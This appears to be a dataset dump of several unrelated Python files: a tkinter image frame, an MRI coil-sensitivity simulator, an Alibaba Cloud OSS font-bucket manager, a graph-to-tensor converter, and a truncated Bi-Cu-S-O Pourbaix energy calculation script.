import tkinter as tk from PIL import ImageTk, Image from Pages.MusicPage.Components.TextFrame import TextFrame class Head(tk.Frame): def __init__(self, master, image, text, data, *args, **kwargs): tk.Frame.__init__(self, master, *args, *kwargs) self['background'] = 'black' self.photo = image self.count = 0 self.image_frame = tk.Frame(self, bg='#000000') self.image_frame.bind('<Configure>', self.frame_size) self.text_frame = TextFrame(self, text, data) self.image_label = tk.Canvas(self.image_frame, bd=0, highlightthickness=0) self.image_label.grid(row=0, column=0, sticky='nsew', ) self.image_label.bind('<Configure>', self.label_size) self.image_frame.grid_columnconfigure(0, weight=1) self.image_frame.grid_rowconfigure(0, weight=1) self.image_frame.grid(row=0, column=0, sticky='nsew', padx=(30, 0), pady=30) self.text_frame.grid(row=0, column=1, sticky='nsew', padx=(10, 0), pady=(30, 30)) self.grid_rowconfigure(0, weight=1) self.grid_columnconfigure(0, weight=1) self.grid_columnconfigure(1, weight=10000) def frame_size(self, event): pass def label_size(self, event): if self.count == 0: width = int(round(event.width / 1.5)) height = int(round(event.height / 2)) self.photo = self.photo.resize((height, height), Image.ANTIALIAS) self.photo = ImageTk.PhotoImage(self.photo) self.image_label.config(width=width, height=height) self.image_label.create_image(0, 0, image=self.photo, anchor=tk.NW, tags="IMG") self.image_label.configure(width=height) self.count = 1
2.828125
3
direct/data/sens.py
NKI-AI/direct
57
12789909
# coding=utf-8 # Copyright (c) DIRECT Contributors from typing import List, Optional, Tuple, Union import numpy as np from scipy.stats import multivariate_normal as normal def simulate_sensitivity_maps( shape: Union[List[int], Tuple[int]], num_coils: int, var: float = 1, seed: Optional[int] = None ) -> np.ndarray: r"""Simulates coil sensitivities using bi-variate or tri-variate gaussian distribution. Parameters ---------- shape: List[int] or Tuple[int] (nx, ny) or (nx, ny, nz). num_coils: int Number of coils to be simulated. var: float Variance. seed: int or None If not None, a seed will be used to produce an offset for the gaussian mean :math:`\mu`. Returns ------- sensitivity_map : nd.array Simulated coil sensitivity maps of shape (num_coils, \*shape). Notes ----- Sensitivity maps are normalized such that: .. math:: \sum_{k=1}^{n_c} {S^{k}}^{*}S^{k} = I. """ if num_coils == 1: return np.ones(shape)[None] + 0.0j # X, Y are switched in np.meshgrid meshgrid = np.meshgrid(*[np.linspace(-1, 1, n) for n in shape[:2][::-1] + shape[2:]]) indices = np.stack(meshgrid, axis=-1) sensitivity_map = np.zeros((num_coils, *shape)) # Assume iid cov = np.zeros(len(shape)) for ii in range(len(shape)): cov[ii] = var cov = np.diag(cov) if seed: np.random.seed(seed) offset = np.random.uniform(0, 2 * np.pi, 1) for coil_idx in range(num_coils): mu = [ np.cos(coil_idx / num_coils * 2 * np.pi + offset).item(), np.sin(coil_idx / num_coils * 2 * np.pi + offset).item(), ] if len(shape) == 3: mu += [0.0] sensitivity_map[coil_idx] = normal(mu, cov).pdf(indices) sensitivity_map = sensitivity_map + 1.0j * sensitivity_map # make complex # Normalize sensitivity_map_norm = np.sqrt((np.conj(sensitivity_map) * sensitivity_map).sum(0))[None] sensitivity_map = sensitivity_map / sensitivity_map_norm return sensitivity_map
2.828125
3
aliOss/bucket_manage.py
sunnywalden/oss_management
0
12789910
<reponame>sunnywalden/oss_management # !/usr/bin/env python # coding=utf-8 # author: <EMAIL> import oss2 import json import base64 import os import sys import time from itertools import islice from utils.get_logger import Log from utils.fonts_scanner import get_fonts_from_local from conf import config from aliOss.oss_manage import OssManager class BucketManager: def __init__(self, internet=True): log = Log() self.logger = log.logger_generate('bucket_manage') self.auth = self.get_auth() # self.region = region self.inter_net = internet # self.buck_name = bucket_name @staticmethod def get_auth(): auth = oss2.Auth(config.ali_accesskeyid, config.ali_accesskeysecret) return auth def create_bucket(self, region, bucket_name): oss_url = OssManager.get_oss_url(region, internal_net=False) bucket = oss2.Bucket(self.auth, oss_url, bucket_name) # 设置存储空间为私有读写权限。 bucket.create_bucket(oss2.models.BUCKET_ACL_PRIVATE) def get_font_bucket(self): oss_manager = OssManager() for font_bucket_region in config.ali_fonts_bucket: region = font_bucket_region font_oss_url = oss_manager.get_oss_url(region, internal_net=self.inter_net) bucket_name = config.ali_fonts_bucket[font_bucket_region]['bucket_name'] font_bucket = oss2.Bucket(self.auth, font_oss_url, bucket_name) yield font_bucket def percentage(self, consumed_bytes, total_bytes): """进度条回调函数,计算当前完成的百分比 :param consumed_bytes: 已经上传/下载的数据量 :param total_bytes: 总数据量 """ if total_bytes: # time.sleep(30) rate = int(100 * (float(consumed_bytes) / float(total_bytes))) if rate != 0 and rate % 25 == 0 or rate % 50 == 0 or rate % 75 == 0 or rate % 100 == 0: print(' {0}% '.format(rate), end=' ') sys.stdout.flush() def upload_fonts(self, file_path): file_name = file_path.split('/')[-1] fonts_buckets = self.get_font_bucket() for fonts_bucket in fonts_buckets: # get bucket region fonts_bucket_info = fonts_bucket.get_bucket_info() region = fonts_bucket_info.location.split('-')[-1] # get font bucket sotorage dir fonts_dir = config.ali_fonts_bucket[region]['font_dir'] upload_res = oss2.resumable_upload(fonts_bucket, os.path.join(fonts_dir, file_name), file_path, store=oss2.ResumableStore(root='./tmp_files/uploads'), multipart_threshold=100 * 1024, part_size=100 * 1024, progress_callback=self.percentage, num_threads=4) print('', end='\n') # print('Upload response: %s' % upload_res) if upload_res.status == 200 or upload_res.resp.status == "OK": print('Font %s upload to bucket %s successed' % (file_name, fonts_bucket.bucket_name)) self.logger.info('Font %s upload to bucket %s successed' % (file_name, fonts_bucket.bucket_name)) else: print('Font %s upload to bucket %s failed' % (file_name, fonts_bucket.bucket_name)) self.logger.error('Font %s upload to bucket %s failed' % (file_name, fonts_bucket.bucket_name)) def delete_fonts(self, files_names=[], keyword='', pref=''): fonts_buckets = self.get_font_bucket() for fonts_bucket in fonts_buckets: # get bucket region fonts_bucket_info = fonts_bucket.get_bucket_info() region = fonts_bucket_info.location.split('-')[-1] bucket_name = config.ali_fonts_bucket[region]['bucket_name'] # get font bucket sotorage dir fonts_dir = config.ali_fonts_bucket[region]['font_dir'] if files_names: fonts_list = list(map(lambda file_name: os.path.join(fonts_dir, file_name), files_names)) else: fonts_dict = self.get_fonts(keyword=keyword, pref=pref) # print(fonts_dict) if fonts_dict: fonts_list = fonts_dict[bucket_name] else: fonts_list = [] print('No fonts matched to be deleted in bucket %s' % bucket_name) self.logger.info('No fonts matched to be deleted in bucket %s' % bucket_name) break if fonts_list: fonts_names = list(map(lambda font_oss_object: font_oss_object.key, fonts_list)) print(fonts_names) print('Fonts %s to be deleted in bucket %s' % (fonts_names, bucket_name)) self.logger.info('Fonts %s to be deleted in bucket %s' % (fonts_names, bucket_name)) delete_res = fonts_bucket.batch_delete_objects(fonts_names) print('Delete response: %s' % delete_res) self.logger.info('Delete response: %s' % delete_res) if delete_res.status == 200 or delete_res.resp.status == "OK": self.logger.info( 'Font %s delete from bucket %s successed' % (delete_res.deleted_keys, fonts_bucket.bucket_name)) else: self.logger.error( 'Font %s delete from bucket %s failed' % (delete_res.deleted_keys, fonts_bucket.bucket_name)) else: pass def get_fonts(self, keyword='', pref=''): fonts_dict = {} for fonts_bucket in iter(self.get_font_bucket()): # get bucket region fonts_bucket_info = fonts_bucket.get_bucket_info() region = fonts_bucket_info.location.split('-')[-1] # get font bucket sotorage dir fonts_dir = config.ali_fonts_bucket[region]['font_dir'] self.logger.info('Fonts storage direction %s' % fonts_dir) fonts_list_object = fonts_bucket.list_objects(prefix=fonts_dir, max_keys=1000) fonts_list = fonts_list_object.object_list fonts_names = list(filter( lambda fonts_name: keyword in fonts_name.key and fonts_name.key.split(fonts_dir)[-1].startswith(pref), fonts_list)) fonts_dict[fonts_bucket.bucket_name] = fonts_names return fonts_dict def print_fonts(self, keyword='', pref=''): fonts_dict = self.get_fonts(keyword=keyword, pref=pref) print(fonts_dict) # for bucket_name, fonts_list in fonts_dict: for bucket_name in fonts_dict: fonts_list = fonts_dict[bucket_name] print('There is total %s Fonts in bucket:%s ' % (len(fonts_list), bucket_name)) self.logger.info('Fonts in bucket : %s ' % bucket_name) for font in fonts_list: file_name = font.key if file_name.endswith('tf'): print('%s' % file_name) self.logger.info('%s' % file_name) def download_fonts(self, keyword='', pref=''): for fonts_bucket in iter(self.get_font_bucket()): # get bucket region fonts_bucket_info = fonts_bucket.get_bucket_info() region = fonts_bucket_info.location.split('-')[-1] # get font bucket sotorage dir fonts_dir = config.ali_fonts_bucket[region]['font_dir'] bucket_name = fonts_bucket.bucket_name # oss2.ObjectIteratorr用于遍历文件。 oss_object_list = oss2.ObjectIterator(fonts_bucket) for font_file in oss_object_list: file_name = font_file.key.split(fonts_dir)[-1] if file_name.endswith('tf') and keyword in file_name and file_name.startswith(pref) and fonts_dir in font_file.key: print('fonts %s matched for download in bucket %s' % (font_file.key, fonts_bucket.bucket_name)) self.logger.info( 'fonts %s matched for download in bucket %s' % (font_file.key, fonts_bucket.bucket_name)) try: oss2.resumable_download(fonts_bucket, font_file, '../downloads/' + font_file, part_size=100 * 1024, num_threads=3, progress_callback=self.percentage, store=oss2.ResumableDownloadStore(root='./tmp_files/downloads')) except oss2.exceptions.NotFound as en: self.logger.exception('Font %s not found while download fonts' % font_file) except Exception as e: self.logger.exception('Exception catched while download fonts %s: %s' % (font_file, e)) else: # print('fonts %s not matched for download in bucket %s' % (file_name, fonts_bucket.bucket_name)) self.logger.debug('fonts %s not matched for download in bucket %s' % (file_name, fonts_bucket.bucket_name)) def upload_fonts_files(self): get_fonts_files = get_fonts_from_local() for fonts_file in iter(get_fonts_files): print('Fonts to be uploaded to ali oss: %s' % fonts_file) self.logger.info('Fonts to be uploaded to ali oss: %s' % fonts_file) self.upload_fonts(fonts_file) if __name__ == '__main__': bucket_region = 'shanghai' # if you are not in a aliyun env, please set it to False inter_net = False bk_manage = BucketManager(internet=inter_net) # print all fonts in ali oss font_dir bk_manage.print_fonts(keyword='AlibabaSans', pref='AlibabaSans') # # download all fonts from to local dir ./downloads/ # bk_manage.download_fonts(keyword='test', pref='test') # bk_manage.download_fonts(keyword='AlibabaSans', pref='AlibabaSans') # upload all fonts in local dir ./fonts/ # bk_manage.upload_fonts_files() # bk_manage.delete_fonts(keyword='test', pref='test')
2
2
cargonet/utils/convert.py
romnnn/rail-stgcnn
2
12789911
import torch def nx_to_tg(g, node_features=None, edge_features=None, convert_edges=True): node_features = node_features or [] edge_features = edge_features or [] n_nodes = g.number_of_nodes() nodes = torch.zeros(n_nodes, len(node_features), dtype=torch.float) for n, data in g.nodes(data=True): for j, feature in enumerate(node_features): nodes[i][j] = data[feature] n_edges = g.number_of_edges() edges = torch.zeros(n_edges, 2, dtype=torch.long) edge_attrs = torch.zeros(n_edges, len(edge_features), dtype=torch.long) if convert_edges: for i, edge in enumerate(g.edges): u, v = edge edges[i][0], edges[i][1] = u, v for j, feature in enumerate(edge_features): edge_attrs[i][j] = g.edges[edge][feature] if n_edges > 0: edges = edges.t() edges = to_undirected(edges) return Data(x=nodes, edge_attr=edge_attrs, edge_index=edges.contiguous())
2.4375
2
BiCuOS_standardstate.py
MTD-group/BiMOQ-PourbaixDiagrams
0
12789912
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Jul 23 13:17:41 2018 @author: laurenwalters """ import numpy as np import matplotlib.pyplot as plt import random #For saving/importing data from numpy import asarray from numpy import save from numpy import load #Created by <NAME>, 2018-2020 #Contributions by <NAME> #For reactions in aqueous conditions #find out how much detail you want in your graph #n=input("Enter the mesh grid detail you want, suggested (30-140): ") n=30; #Constants R=8.31447; #kJ/(mol*K) T=298.15; #K F= 9.648533*10**4; #kJ/(V*mol) P=1; #bar, 10^5*Pa eta=6 nI=10**-eta; #Activity Concentration #Array showing the composition of Cu:Bi:S composition=np.array([1,1,1]) #pH Range and Constants lowpH = -2; highpH = 16; pHrange = int; pHrange = highpH-lowpH; pHcount = pHrange/n; #used to iterate through pH range #Applied Potential Range and Constants Ulow = -1.5; #V Uhigh = 1.5; #V Urange = Uhigh-Ulow; #V Ucount = Urange/n; #used to iterate through U (energy) range ############################################################################### ######################## DFT CALCULATIONS ##################################### ############################################################################### #Electronic Energies in eV/f.u. #PBEsol with SOC Ee_Bi= -5.114928333; Ee_Bi2O3= -31.163316; Ee_Bi2O5= -40.1344765; Ee_Bi2O4=-36.7221975; Ee_Bi4O7=-68.40888; #PBEsol Ee_Cu=-4.3152965; Ee_CuO=-10.7488868; Ee_Cu2O=-14.99698; Ee_CuOH2_s=-25.1916025; #PBEsol Ee_O2=-10.281123 Ee_H2=-6.5141508 Ee_S= -4.391811875; ############################################################################### ########### MULTICOMPONENT SPECIES ############################################ #Calculated with PBEsol Ee_Cu2S=-13.4793116667; Ee_Cu7S4=-49.8241325; Ee_CuS=-9.170266; Ee_CuS2=-13.63935; Ee_Cu2SO4_3=-101.5166; Ee_BiCu=-9.31218; Ee_CuBiO2_2=-42.245475; Ee_BiS2=-14.6172585; Ee_Bi2S3=-24.878388; Ee_Bi2S2O=-27.2327565; Ee_Bi2SO4_3=-109.35902; Ee_Bi14OS24=-247.57619; Ee_Bi2SO2=-29.50652; Ee_BiSCuO=-21.5022935; Ee_Cu3BiS3=-32.4713275; Ee_Cu4Bi4S9=-80.830705; Ee_Cu4BiS2_5=-90.647798; Ee_CuBiS2=-19.041996; ############################################################################### ###### Vibrational Energy ##################################################### ############################################################################### #Vibrational Energies in eV/f.u. #From PBEsol Phonon Calculations Fvib_O2=-0.272; F_rot_trans_O2=0.099; Ftot_O2=Fvib_O2+F_rot_trans_O2; F_H = .202; Fvib_S=-0.0091266451372 Fvib_CuO=0.062498987735 Fvib_Cu2O=0.00507624852 Fvib_Cu=-0.007167374680 Fvib_CuOH2_s=0.66653026525 Fvib_Bi=-0.0761976993239 Fvib_Bi2O3=-0.057653546889 Fvib_Bi2O5=0.14677315404 Fvib_Bi2O4=0.12231438709 Fvib_Bi4O7=0.08741679245 Fvib_Cu2S=-0.0050937891364 Fvib_Cu7S4=-0.178002185722 Fvib_CuS=-0.0119849701814 Fvib_CuS2=-0.0033060080158 Fvib_Cu2SO4_3=1.00135494361 Fvib_BiCu=-0.11006963132 Fvib_CuBiO2_2=0.09853363658 Fvib_BiS2=-0.063943629448 Fvib_Bi2S3=-0.1428187610337 Fvib_Bi2S2O=-0.08193190191 Fvib_Bi2SO4_3=0.81266278392 Fvib_Bi14OS24=0.02990373431 Fvib_Bi2SO2=-0.0265520338422 Fvib_BiSCuO=-0.039894146059 Fvib_Cu3BiS3=-0.1661179102334 Fvib_Cu4Bi4S9=-0.3270592722135 Fvib_Cu4BiS2_5=-0.430548296696 Fvib_CuBiS2=-0.08663072302 ############################################################################### ### Compounds-Calculate the formation energies ############################ ############################################################################### #Free Energies of Formation in eV/f.u. dGf_CuO= (Ee_CuO+Fvib_CuO) -(Ee_Cu+Fvib_Cu) - 0.5*(Ee_O2+Ftot_O2); dGf_Cu2O=(Ee_Cu2O+Fvib_Cu2O) -2.0*(Ee_Cu+Fvib_Cu) - 0.5*(Ee_O2+Ftot_O2); dGf_CuOH2_s= (Ee_CuOH2_s+Fvib_CuOH2_s) -(Ee_Cu+Fvib_Cu)-(Ee_O2+Ftot_O2)-(Ee_H2+F_H); dGf_Bi2O3= ((Ee_Bi2O3)+Fvib_Bi2O3) -2.0*(Ee_Bi+Fvib_Bi)-1.5*(Ee_O2-Ftot_O2); dGf_Bi2O5= ((Ee_Bi2O5)+Fvib_Bi2O5) -2.0*(Ee_Bi+Fvib_Bi)-2.5*(Ee_O2-Ftot_O2); dGf_Bi2O4= ((Ee_Bi2O4)+Fvib_Bi2O4) -2.0*(Ee_Bi+Fvib_Bi)-2.0*(Ee_O2-Ftot_O2); dGf_Bi4O7= ((Ee_Bi4O7)+Fvib_Bi4O7) -4.0*(Ee_Bi+Fvib_Bi)-3.5*(Ee_O2-Ftot_O2); dGf_Cu2S=(Ee_Cu2S+Fvib_Cu2S) -2*(Ee_Cu+Fvib_Cu)-(Ee_S+Fvib_S); dGf_Cu7S4=(Ee_Cu7S4+Fvib_Cu7S4) -7*(Ee_Cu+Fvib_Cu)-4*(Ee_S+Fvib_S); dGf_CuS=(Ee_CuS+Fvib_CuS) -(Ee_Cu+Fvib_Cu)-(Ee_S+Fvib_S); dGf_CuS2=(Ee_CuS2+Fvib_CuS2) -(Ee_Cu+Fvib_Cu)-2*(Ee_S+Fvib_S); dGf_Cu2SO4_3=(Ee_Cu2SO4_3+Fvib_Cu2SO4_3) -2*(Ee_Cu+Fvib_Cu)-3*(Ee_S+Fvib_S)-6.0*((Ee_O2)-Ftot_O2); dGf_BiCu=(Ee_BiCu+Fvib_BiCu) -(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi); dGf_CuBiO2_2=(Ee_CuBiO2_2+Fvib_CuBiO2_2) -(Ee_Cu+Fvib_Cu)-2*(Ee_Bi+Fvib_Bi)-2.0*((Ee_O2)-Ftot_O2); dGf_BiS2=(Ee_BiS2+Fvib_BiS2) -(Ee_Bi+Fvib_Bi)-2*(Ee_S+Fvib_S); dGf_Bi2S3=(Ee_Bi2S3+Fvib_Bi2S3) -2*(Ee_Bi+Fvib_Bi)-3*(Ee_S+Fvib_S); dGf_Bi2S2O=(Ee_Bi2S2O+Fvib_Bi2S2O) -2*(Ee_Bi+Fvib_Bi)-2*(Ee_S+Fvib_S)-0.5*((Ee_O2)-Ftot_O2); dGf_Bi2SO4_3=(Ee_Bi2SO4_3+Fvib_Bi2SO4_3) -2*(Ee_Bi+Fvib_Bi)-3*(Ee_S+Fvib_S)-6.0*((Ee_O2)-Ftot_O2); dGf_Bi14OS24=(Ee_Bi14OS24+Fvib_Bi14OS24) -14*(Ee_Bi+Fvib_Bi)-24*(Ee_S+Fvib_S)-0.5*((Ee_O2)-Ftot_O2); dGf_Bi2SO2=(Ee_Bi2SO2+Fvib_Bi2SO2) -2*(Ee_Bi+Fvib_Bi)-(Ee_S+Fvib_S)-1.0*((Ee_O2)-Ftot_O2); dGf_BiSCuO=(Ee_BiSCuO+Fvib_BiSCuO) -(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi)-(Ee_S+Fvib_S)-0.5*((Ee_O2)-Ftot_O2); dGf_Cu3BiS3=(Ee_Cu3BiS3+Fvib_Cu3BiS3) -3*(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi)-3*(Ee_S+Fvib_S); dGf_Cu4Bi4S9=(Ee_Cu4Bi4S9+Fvib_Cu4Bi4S9) -4*(Ee_Cu+Fvib_Cu)-4*(Ee_Bi+Fvib_Bi)-9*(Ee_S+Fvib_S); dGf_Cu4BiS2_5=(Ee_Cu4BiS2_5+Fvib_Cu4BiS2_5)-4*(Ee_Cu+Fvib_Cu)-5*(Ee_Bi+Fvib_Bi)-10*(Ee_S+Fvib_S); dGf_CuBiS2=(Ee_CuBiS2+Fvib_CuBiS2) -(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi)-2*(Ee_S+Fvib_S); #Set the reference values dGf_Cu=0.0; dGf_Bi=0.0; dGf_S=0.0; ############################################################################### ############################################################################### ############################################################################### ############################################################################### ############## Aqueous Ion Free Energies of Formation ######################### #Free Energies of Formation in eV/f.u. ##Elemental Bismuth Species dGf_Bi_3Plus= 0.6430898 dGf_BiOH_2Plus= -1.6968378 dGf_BiO_Plus= -1.4977965 ##Elemental Copper Species dGf_Cu1= 0.506502 dGf_Cu2= 0.674092 dGf_CuOH2_minus= -3.4518209 dGf_CuOH3= -5.1197432 dGf_CuOH_Plus= -1.3127387 dGf_CuOH4_2=-6.814302 dGf_CuOH2= -3.2666113 dGf_CuOH = -1.2677578 dGf_Cu2OH2_2plus=-2.942417 dGf_Cu3OH4_2plus=-6.567839 #Elemental Sulphur Species dGf_H2S=-0.283601 dGf_HS_Minus=0.13053 dGf_S_2Minus=0.9521892 dGf_S2_2Minus=0.8563979 dGf_S3_2Minus=0.7791664 dGf_S4_2Minus=0.7204948 dGf_S5_2Minus=0.6803396 dGf_H2S2O3=-5.6329986 dGf_HS2O3_Minus=-5.6156529 dGf_S2O3_2Minus=-5.515915 dGf_S5O6_2Minus=-9.9087 dGf_S4O6_2Minus=-10.5939 dGf_HS2O4_Minus=-6.13203282 dGf_S2O4_2Minus=-5.9842 dGf_S3O6_2Minus=-9.930382 dGf_H2SO3=-5.580528 dGf_HSO3_Minus=-5.464 dGf_SO3_2Minus=-5.03457 dGf_S2O6_2Minus=-10.02 dGf_H2SO4=-7.6901922 dGf_HSO4_Minus=-7.8029389 dGf_SO4_2Minus=-7.6901922 dGf_S2O8_2Minus=-11.361 dGf_HSO5_Minus= -6.60739025 dGf_S2O5_2Minus= -8.195817793 #Water dGf_H2O=-2.458; ############################################################################### ############################################################################### ############################################################################### ################################################################################ ############# CONVERT from eV to kJ/mol #################################### ############################################################################### dGf_Cu= dGf_Cu*F; dGf_CuO= dGf_CuO*F; dGf_Cu2O= dGf_Cu2O*F; dGf_Cu1= dGf_Cu1*F; dGf_Cu2= dGf_Cu2*F; dGf_CuOH4_2= dGf_CuOH4_2*F; dGf_CuOH2_minus= dGf_CuOH2_minus*F; dGf_CuOH3= dGf_CuOH3*F; dGf_CuOH_Plus= dGf_CuOH_Plus*F; dGf_CuOH2= dGf_CuOH2*F; dGf_CuOH = dGf_CuOH*F; dGf_Cu2OH2_2plus=dGf_Cu2OH2_2plus*F; dGf_Cu3OH4_2plus=dGf_Cu3OH4_2plus*F; dGf_CuOH2_s=dGf_CuOH2_s*F dGf_Bi= dGf_Bi*F; dGf_Bi2O3= dGf_Bi2O3*F; dGf_Bi2O5= dGf_Bi2O5*F; dGf_Bi2O4=dGf_Bi2O4*F; dGf_Bi4O7=dGf_Bi4O7*F; dGf_Bi_3Plus= dGf_Bi_3Plus*F; dGf_BiOH_2Plus= dGf_BiOH_2Plus*F; dGf_BiO_Plus= dGf_BiO_Plus*F; dGf_S= dGf_S*F; dGf_H2S=dGf_H2S*F; dGf_HS_Minus=dGf_HS_Minus*F; dGf_S_2Minus=dGf_S_2Minus*F; dGf_S2_2Minus=dGf_S2_2Minus*F; dGf_S3_2Minus=dGf_S3_2Minus*F; dGf_S4_2Minus=dGf_S4_2Minus*F; dGf_S5_2Minus=dGf_S5_2Minus*F; dGf_H2S2O3=dGf_H2S2O3*F; dGf_HS2O3_Minus=dGf_HS2O3_Minus*F; dGf_S2O3_2Minus=dGf_S2O3_2Minus*F; dGf_S5O6_2Minus=dGf_S5O6_2Minus*F; dGf_S4O6_2Minus=dGf_S4O6_2Minus*F; dGf_HS2O4_Minus=dGf_HS2O4_Minus*F; dGf_S2O4_2Minus=dGf_S2O4_2Minus*F; dGf_S3O6_2Minus=dGf_S3O6_2Minus*F; dGf_H2SO3=dGf_H2SO3*F; dGf_HSO3_Minus=dGf_HSO3_Minus*F; dGf_SO3_2Minus=dGf_SO3_2Minus*F; dGf_S2O6_2Minus=dGf_S2O6_2Minus*F; dGf_H2SO4=dGf_H2SO4*F; dGf_HSO4_Minus=dGf_HSO4_Minus*F; dGf_SO4_2Minus=dGf_SO4_2Minus*F; dGf_S2O8_2Minus=dGf_S2O8_2Minus*F; dGf_HSO5_Minus=dGf_HSO5_Minus*F; dGf_S2O5_2Minus=dGf_S2O5_2Minus*F; dGf_Cu2S=dGf_Cu2S*F; dGf_Cu7S4=dGf_Cu7S4*F; dGf_CuS=dGf_CuS*F; dGf_CuS2=dGf_CuS2*F; dGf_Cu2SO4_3=dGf_Cu2SO4_3*F; dGf_BiCu=dGf_BiCu*F; dGf_CuBiO2_2=dGf_CuBiO2_2*F; dGf_BiS2=dGf_BiS2*F; dGf_Bi2S3=dGf_Bi2S3*F; dGf_Bi2S2O=dGf_Bi2S2O*F; dGf_Bi2SO4_3=dGf_Bi2SO4_3*F; dGf_Bi14OS24=dGf_Bi14OS24*F; dGf_Bi2SO2=dGf_Bi2SO2*F; dGf_BiSCuO=dGf_BiSCuO*F; dGf_Cu3BiS3=dGf_Cu3BiS3*F; dGf_Cu4Bi4S9=dGf_Cu4Bi4S9*F; dGf_Cu4BiS2_5=dGf_Cu4BiS2_5*F; dGf_CuBiS2=dGf_CuBiS2*F; dGf_H2O= dGf_H2O*F; ############################################################################### ############################################################################### ############################################################################### ############################################################################### ############### Populate the species matrix ################################ ############################################################################### species=np.zeros((65,8)) ######## Formation Energies ################################################### species[0,0]=0.00; species[1,0]=dGf_CuO species[2,0]=dGf_Cu2O species[3,0]=dGf_Cu1 species[4,0]=dGf_Cu2 species[5,0]=dGf_CuOH4_2 species[6,0]=dGf_CuOH2_minus species[7,0]=dGf_CuOH3 species[8,0]=dGf_CuOH_Plus species[9,0]=dGf_CuOH2 species[10,0]=dGf_CuOH species[11,0]=dGf_Cu2OH2_2plus species[12,0]=dGf_Cu3OH4_2plus species[13,0]=dGf_Bi species[14,0]=dGf_Bi2O3 species[15,0]=dGf_Bi2O5 species[16,0]=dGf_Bi2O4 species[17,0]=dGf_Bi4O7 species[18,0]=dGf_Bi_3Plus species[19,0]=dGf_BiOH_2Plus species[20,0]=dGf_BiO_Plus species[21,0]=dGf_S species[22,0]=dGf_H2S species[23,0]=dGf_HS_Minus species[24,0]=dGf_S_2Minus species[25,0]=dGf_S2_2Minus species[26,0]=dGf_S3_2Minus species[27,0]=dGf_S4_2Minus species[28,0]=dGf_S5_2Minus species[29,0]=dGf_H2S2O3 species[30,0]=dGf_HS2O3_Minus species[31,0]=dGf_S2O3_2Minus species[32,0]=dGf_S5O6_2Minus species[33,0]=dGf_S4O6_2Minus species[34,0]=dGf_HS2O4_Minus species[35,0]=dGf_S2O4_2Minus species[36,0]=dGf_S3O6_2Minus species[37,0]=dGf_H2SO3 species[38,0]=dGf_HSO3_Minus species[39,0]=dGf_SO3_2Minus species[40,0]=dGf_S2O6_2Minus species[41,0]=dGf_H2SO4 species[42,0]=dGf_HSO4_Minus species[43,0]=dGf_SO4_2Minus species[44,0]=dGf_S2O8_2Minus species[45,0]=dGf_HSO5_Minus species[46,0]=dGf_S2O5_2Minus species[47,0]=dGf_Cu2S species[48,0]=dGf_Cu7S4 species[49,0]=dGf_CuS species[50,0]=dGf_CuS2 species[51,0]=dGf_Cu2SO4_3 species[52,0]=dGf_BiCu species[53,0]=dGf_CuBiO2_2 species[54,0]=dGf_BiS2 species[55,0]=dGf_Bi2S3 species[56,0]=dGf_Bi2S2O species[57,0]=dGf_Bi2SO4_3 species[58,0]=dGf_Bi14OS24 species[59,0]=dGf_Bi2SO2 species[60,0]=dGf_CuBiS2 species[61,0]=dGf_Cu4Bi4S9 species[62,0]=dGf_Cu4BiS2_5 species[63,0]=dGf_BiSCuO species[64,0]=dGf_Cu3BiS3 ######## Electron Count ####################################################### #Cu species[0,1]=0.00; species[1,1]=2 species[2,1]=2 species[3,1]=1 species[4,1]=2 species[5,1]=2 species[6,1]=1 species[7,1]=2 species[8,1]=2 species[9,1]=2 species[10,1]=1 species[11,1]=4 species[12,1]=6 #Bi species[13,1]=0 species[14,1]=6 species[15,1]=10 species[16,1]=8 species[17,1]=14 species[18,1]=3 species[19,1]=3 species[20,1]=3 #S species[21,1]=0 species[22,1]=-2 species[23,1]=-2 species[24,1]=-2 species[25,1]=-2 species[26,1]=-2 species[27,1]=-2 species[28,1]=-2 species[29,1]=4 species[30,1]=4 species[31,1]=4 species[32,1]=10 species[33,1]=10 species[34,1]=6 species[35,1]=6 species[36,1]=10 species[37,1]=4 species[38,1]=4 species[39,1]=4 species[40,1]=10 species[41,1]=6 species[42,1]=6 species[43,1]=6 species[44,1]=14 species[45,1]=8 species[46,1]=8 #CuSOBi species[47,1]=0 species[48,1]=0 species[49,1]=0 species[50,1]=0 species[51,1]=24 species[52,1]=0 species[53,1]=8 #BiSO species[54,1]=0 species[55,1]=0 species[56,1]=2 species[57,1]=24 species[58,1]=2 species[59,1]=4 #CuBiS species[60,1]=0 species[61,1]=0 species[62,1]=0 #BiCuSO species[63,1]=2 species[64,1]=0 ######## Hydrogen H+ Count #################################################### #Cu species[0,2]=0 species[1,2]=2 species[2,2]=2 species[3,2]=0 species[4,2]=0 species[5,2]=4 species[6,2]=2 species[7,2]=3 species[8,2]=1 species[9,2]=2 species[10,2]=1 species[11,2]=2 species[12,2]=4 #Bi species[13,2]=0 species[14,2]=6 species[15,2]=10 species[16,2]=8 species[17,2]=14 species[18,2]=0 species[19,2]=1 species[20,2]=2 #S species[21,2]=0 species[22,2]=-2 species[23,2]=-1 species[24,2]=0 species[25,2]=0 species[26,2]=0 species[27,2]=0 species[28,2]=0 species[29,2]=6 species[30,2]=5 species[31,2]=4 species[32,2]=12 species[33,2]=12 species[34,2]=6 species[35,2]=8 species[36,2]=12 species[37,2]=4 species[38,2]=5 species[39,2]=6 species[40,2]=12 species[41,2]=6 species[42,2]=7 species[43,2]=8 species[44,2]=16 species[45,2]=9 species[46,2]=10 #CuSBiO species[47,2]=0 species[48,2]=0 species[49,2]=0 species[50,2]=0 species[51,2]=24 species[52,2]=0 species[53,2]=8 #BiSO species[54,2]=0 species[55,2]=0 species[56,2]=2 species[57,2]=24 species[58,2]=2 species[59,2]=4 #BiCuS species[60,2]=0 species[61,2]=0 species[62,2]=0 #BiCuSO species[63,2]=2 species[64,2]=0 ########### Number of Coppers Cu ############################################## #Cu species[0,3]=1 species[1,3]=1 species[2,3]=2 species[3,3]=1 species[4,3]=1 species[5,3]=1 species[6,3]=1 species[7,3]=1 species[8,3]=1 species[9,3]=1 species[10,3]=1 species[11,3]=2 species[12,3]=3 #Bismuth and Sulphur species[13,3]=0 species[14,3]=0 species[15,3]=0 species[16,3]=0 species[17,3]=0 species[18,3]=0 species[19,3]=0 species[20,3]=0 species[21,3]=0 species[22,3]=0 species[23,3]=0 species[24,3]=0 species[25,3]=0 species[26,3]=0 species[27,3]=0 